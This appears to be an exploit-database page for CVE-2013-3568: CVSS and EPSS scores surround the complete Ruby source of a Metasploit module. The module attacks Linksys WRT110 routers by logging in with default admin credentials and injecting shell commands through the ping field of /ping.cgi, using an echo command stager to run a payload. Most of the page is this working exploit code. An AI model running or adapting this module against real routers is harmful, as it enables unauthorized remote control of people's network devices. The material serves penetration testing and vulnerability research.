8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
6.8 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P
0.973 High
EPSS
Percentile
99.9%
Linksys WRT110 - Remote Command Execution. CVE-2013-3568. Remote exploit for hardware platform
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStagerEcho
def initialize(info = {})
super(update_info(info,
'Name' => 'Linksys WRT110 Remote Command Execution',
'Description' => %q{
The Linksys WRT110 consumer router is vulnerable to a command injection
exploit in the ping field of the web interface.
},
'Author' =>
[
'Craig Young', # Vulnerability discovery
'joev', # msf module
'juan vazquez' # module help + echo cmd stager
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2013-3568'],
['BID', '61151'],
['URL', 'http://seclists.org/bugtraq/2013/Jul/78']
],
'DisclosureDate' => 'Jul 12 2013',
'Privileged' => true,
'Platform' => ['linux'],
'Arch' => ARCH_MIPSLE,
'Targets' =>
[
['Linux mipsel Payload', { } ]
],
'DefaultTarget' => 0,
))
register_options([
OptString.new('USERNAME', [ true, 'Valid router administrator username', 'admin']),
OptString.new('PASSWORD', [ false, 'Password to login with', 'admin']),
OptAddress.new('RHOST', [true, 'The address of the router', '192.168.1.1']),
OptInt.new('TIMEOUT', [false, 'The timeout to use in every request', 20])
], self.class)
end
def check
begin
res = send_request_cgi({
'uri' => '/HNAP1/'
})
rescue ::Rex::ConnectionError
return Exploit::CheckCode::Safe
end
if res and res.code == 200 and res.body =~ /<ModelName>WRT110<\/ModelName>/
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
test_login!
execute_cmdstager
end
# Sends an HTTP request with authorization header to the router
# Raises an exception unless the login is successful
def test_login!
print_status("#{rhost}:#{rport} - Trying to login with #{user}:#{pass}")
res = send_auth_request_cgi({
'uri' => '/',
'method' => 'GET'
})
if not res or res.code == 401 or res.code == 404
fail_with(Failure::NoAccess, "#{rhost}:#{rport} - Could not login with #{user}:#{pass}")
else
print_good("#{rhost}:#{rport} - Successful login #{user}:#{pass}")
end
end
# Run the command on the router
def execute_command(cmd, opts)
send_auth_request_cgi({
'uri' => '/ping.cgi',
'method' => 'POST',
'vars_post' => {
'pingstr' => '& ' + cmd
}
})
Rex.sleep(1) # Give the device a second
end
# Helper methods
def user; datastore['USERNAME']; end
def pass; datastore['PASSWORD'] || ''; end
def send_auth_request_cgi(opts={}, timeout=nil)
timeout ||= datastore['TIMEOUT']
opts.merge!('authorization' => basic_auth(user, pass))
begin
send_request_cgi(opts, timeout)
rescue ::Rex::ConnectionError
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Could not connect to the webservice")
end
end
end
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
6.8 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P
0.973 High
EPSS
Percentile
99.9%